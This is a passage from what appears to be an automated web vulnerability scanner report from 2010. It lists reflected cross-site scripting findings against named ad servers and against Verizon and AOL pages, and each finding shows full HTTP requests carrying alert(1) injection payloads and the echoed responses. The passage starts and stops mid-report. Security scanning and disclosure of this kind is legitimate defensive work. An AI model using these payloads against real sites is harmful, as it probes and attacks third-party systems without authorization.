Path:   /content/0/14302/93015/trust_live_120x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1cb5"%3balert(1)//6a3bb6e004b was submitted in the mpvc parameter. This input was echoed as d1cb5";alert(1)//6a3bb6e004b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14302/93015/trust_live_120x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-93015-2042-15%3Fmpt%3D1290346950383&mpt=1290346950383&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000846013/cstr=34858683=_4ce92233,6585770712,708689^846013^1^0,1_/xsxdata=$xsxdata/bnum=34858683/optn=64?trg=d1cb5"%3balert(1)//6a3bb6e004b&placementid=1430293015204215& HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 13:48:52 GMT
Server: Apache
Last-Modified: Tue, 25 May 2010 18:37:44 GMT
ETag: "429192-c4e-4876f73fe2e00"
Accept-Ranges: bytes
Content-Length: 6458
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_1430293015204215&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">" )
...[SNIP]...
ME=\"FlashVars\" VALUE=\"clickTAG=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000846013/cstr=34858683=_4ce92233,6585770712,708689^846013^1^0,1_/xsxdata=$xsxdata/bnum=34858683/optn=64?trg=d1cb5";alert(1)//6a3bb6e004bhttp://altfarm.mediaplex.com%2Fad%2Fck%2F14302-93015-2042-15%3Fmpt%3D1290346950383&clickTag=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000846013/cstr=34858683=_4ce92233,6585770712,708689
...[SNIP]...

2.411. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [placementid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/93015/trust_live_120x600.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48e2f"%3balert(1)//86e8dd44347 was submitted in the placementid parameter. This input was echoed as 48e2f";alert(1)//86e8dd44347 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14302/93015/trust_live_120x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-93015-2042-15%3Fmpt%3D1290346950383&mpt=1290346950383&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000846013/cstr=34858683=_4ce92233,6585770712,708689^846013^1^0,1_/xsxdata=$xsxdata/bnum=34858683/optn=64?trg=&placementid=143029301520421548e2f"%3balert(1)//86e8dd44347& HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 13:49:09 GMT
Server: Apache
Last-Modified: Tue, 25 May 2010 18:37:44 GMT
ETag: "429192-c4e-4876f73fe2e00"
Accept-Ranges: bytes
Content-Length: 6122
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_143029301520421548e2f";alert(1)//86e8dd44347&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">
...[SNIP]...

2.412. http://img.mediaplex.com/content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7370"%3balert(1)//903f50f46a6 was submitted in the mpck parameter. This input was echoed as a7370";alert(1)//903f50f46a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-112902-2042-4%2F4%3Fmpt%3D1290348141%26siteid%3D0%26Perf_Tracker_1%3D0000778963%26Perf_Tracker_2%3D0000857197%26Perf_Tracker_3%3D1183%26adid%3D290222%26imp_id%3D7390300332479263209%26fcid%3D290232%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D66612c7712c0a0aad396b2c6fef710ef4eca4085%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D171850225304a7370"%3balert(1)//903f50f46a6&mpt=1290348141&siteid=0&Perf_Tracker_1=0000778963&Perf_Tracker_2=0000857197&Perf_Tracker_3=1183&adid=290222&imp_id=7390300332479263209&fcid=290232&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=66612c7712c0a0aad396b2c6fef710ef4eca4085&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=171850225304&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOmx4DT_no9mfxe8qqcfxE5tJulMAAAAAFxIAgBkAAAAZAAAAAIAAACGgwEAAQAAAFVTRABVU0QA2AJaAKAEAACUBwACAwIFAAAAAABXE3uK%2Fcnd%3D%21HyTSyAjuDhCGhwYYyG0groIBKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFCEwgKEAAYACACKP7__________wFCEwgLEAAYACADKP7__________wFIAFAAWKAJ%2Freferrer%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F%2Fclickenc%3Dhttp%253A%252F%252Fr1.ace.advertising.com%252Fclick%252Fsite%253D0000778963%252Fmnum%253D0000857197%252Fcstr%253D18249923%253D_4ce9266d%252C8572034715%252C778963%255E857197%255E1183%255E0%252C1_%252Fxsxdata%253D%2524xsxdata%252Fbnum%253D18249923%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: img.mediaplex.com
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 14:15:52 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 2010 05:25:33 GMT
ETag: "6ba053-203c-49510ab4fed40"
Accept-Ranges: bytes
Content-Length: 22794
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );

/******** DAP Code ********/
var UTCoffset=0;
var UTCdt=0;
var engStartTime=0;
var engTime=0;
var engEvent=new Array();
var engData=new Array();
var above
...[SNIP]...
2479263209&fcid=290232&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=66612c7712c0a0aad396b2c6fef710ef4eca4085&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=171850225304a7370";alert(1)//903f50f46a6", "6335828", "<geozip/>
...[SNIP]...

2.413. http://img.mediaplex.com/content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 212e4"%3balert(1)//55ca0bfa95f was submitted in the mpvc parameter. This input was echoed as 212e4";alert(1)//55ca0bfa95f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-112902-2042-4%2F4%3Fmpt%3D1290348141%26siteid%3D0%26Perf_Tracker_1%3D0000778963%26Perf_Tracker_2%3D0000857197%26Perf_Tracker_3%3D1183%26adid%3D290222%26imp_id%3D7390300332479263209%26fcid%3D290232%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D66612c7712c0a0aad396b2c6fef710ef4eca4085%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D171850225304&mpt=1290348141&siteid=0&Perf_Tracker_1=0000778963&Perf_Tracker_2=0000857197&Perf_Tracker_3=1183&adid=290222&imp_id=7390300332479263209&fcid=290232&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=66612c7712c0a0aad396b2c6fef710ef4eca4085&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=171850225304&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOmx4DT_no9mfxe8qqcfxE5tJulMAAAAAFxIAgBkAAAAZAAAAAIAAACGgwEAAQAAAFVTRABVU0QA2AJaAKAEAACUBwACAwIFAAAAAABXE3uK%2Fcnd%3D%21HyTSyAjuDhCGhwYYyG0groIBKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFCEwgKEAAYACACKP7__________wFCEwgLEAAYACADKP7__________wFIAFAAWKAJ%2Freferrer%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F%2Fclickenc%3Dhttp%253A%252F%252Fr1.ace.advertising.com%252Fclick%252Fsite%253D0000778963%252Fmnum%253D0000857197%252Fcstr%253D18249923%253D_4ce9266d%252C8572034715%252C778963%255E857197%255E1183%255E0%252C1_%252Fxsxdata%253D%2524xsxdata%252Fbnum%253D18249923%252Foptn%253D64%253Ftrg%253D212e4"%3balert(1)//55ca0bfa95f HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: img.mediaplex.com
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 14:16:05 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 2010 05:25:33 GMT
ETag: "6ba053-203c-49510ab4fed40"
Accept-Ranges: bytes
Content-Length: 22714
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );

/******** DAP Code ********/
var UTCoffset=0;
var UTCdt=0;
var engStartTime=0;
var engTime=0;
var engEvent=new Array();
var engData=new Array();
var above
...[SNIP]...
dvertising.com%2Fclick%2Fsite%3D0000778963%2Fmnum%3D0000857197%2Fcstr%3D18249923%3D_4ce9266d%2C8572034715%2C778963%5E857197%5E1183%5E0%2C1_%2Fxsxdata%3D%24xsxdata%2Fbnum%3D18249923%2Foptn%3D64%3Ftrg%3D212e4";alert(1)//55ca0bfa95fhttp://rover.ebay.com%2Frover%2F1%2F711-112902-2042-4%2F4%3Fmpt%3D1290348141%26siteid%3D0%26Perf_Tracker_1%3D0000778963%26Perf_Tracker_2%3D0000857197%26Perf_Tracker_3%3D1183%26adid%3D290222%26imp_id%3D
...[SNIP]...

2.414. https://login.verizonwireless.com/amserver/UI/Login [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.verizonwireless.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into the HTML document as plain text between tags. The payload 6de26<script>alert(1)</script>4fbcd7f0168 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /amserver/UI/Login?realm=vzw&goto=https%3A%2F%2Febillpay.verizonwireless.com%3A443%2Fvzw%2Faccountholdere81b3%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec38e61d6c8d%2Faccount%2Fmaint-features.do6de26<script>alert(1)</script>4fbcd7f0168 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: login.verizonwireless.com
Cookie: CP=null*; GLOBALID=Pvbfe%252BDx4uFoyNU%252F13blWyzmFSrs3%252BFXvaK2itxahX9okKM3L2nevgZyFVBxwEaw
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 21 Nov 2010 22:05:45 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en-US
Set-cookie: JSESSIONID=7A9826CD5D23CA268A50CFFD3528079D;Path=/
Set-cookie: acProd=AQIC5wM2LY4SfcwY0wfaKBuOMxpmGe1oIfOXZmuEEcO6mE0%3D%40AAJTSwAKMjA3MjQzOTY0MAACU0kAAjcwAAJTMQACbzI%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4SfcwY0wfaKBuOMxpmGe1oIfOXZmuEEcO6mE0%3D%40AAJTSwAKMjA3MjQzOTY0MAACU0kAAjcwAAJTMQACbzI%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=o2;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=o2;Domain=.vzwcorp.com;Path=/;Secure
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 15119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
</script>c38e61d6c8d/account/maint-features.do6de26<script>alert(1)</script>4fbcd7f0168" />
...[SNIP]...

2.415. http://news.aol.com/videos/video-hub/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.aol.com
Path:   /videos/video-hub/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd09d"style%3d"x%3aexpression(alert(1))"4900d907974 was submitted in the REST URL parameter 2. This input was echoed as bd09d"style="x:expression(alert(1))"4900d907974 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /videos/video-hubbd09d"style%3d"x%3aexpression(alert(1))"4900d907974/?query= HTTP/1.1
Host: news.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 16:49:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Set-Cookie: JSESSIONID=F4F53BA33A13D10F8952167DC0EDE14B; Path=/videos
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Length: 26811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Created by Rolando Rivera and Geeta Bhavi -->
<html>
<head>

...[SNIP]...
<input type="hidden" name="query" value="bd09d"style="x:expression(alert(1))"4900d907974/?query=" />
...[SNIP]...

2.416. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b439"><script>alert(1)</script>14a07652aec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439"><script>alert(1)</script>14a07652aec/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 359
Content-Type: text/html
Cache-Control: private
Content-Length: 359

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(1)</script>14a07652aec/homepage/708539588/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.417. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce74"><script>alert(1)</script>92b0fb76a8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage2ce74"><script>alert(1)</script>92b0fb76a8b/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage2ce74"><script>alert(1)</script>92b0fb76a8b/L15/230690700/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&po
...[SNIP]...

2.418. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b64"><script>alert(1)</script>22bd36ebe57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top53b64"><script>alert(1)</script>22bd36ebe57?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 352
Content-Type: text/html
Cache-Control: private
Content-Length: 352

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/1247056197/Top53b64"><script>alert(1)</script>22bd36ebe57/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.419. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [audio_conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd15"><script>alert(1)</script>e9b1c6ac9bf was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=fbd15"><script>alert(1)</script>e9b1c6ac9bf&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=fbd15"><script>alert(1)</script>e9b1c6ac9bf&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.420. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [bbaw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04e9"><script>alert(1)</script>88b43b9e841 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

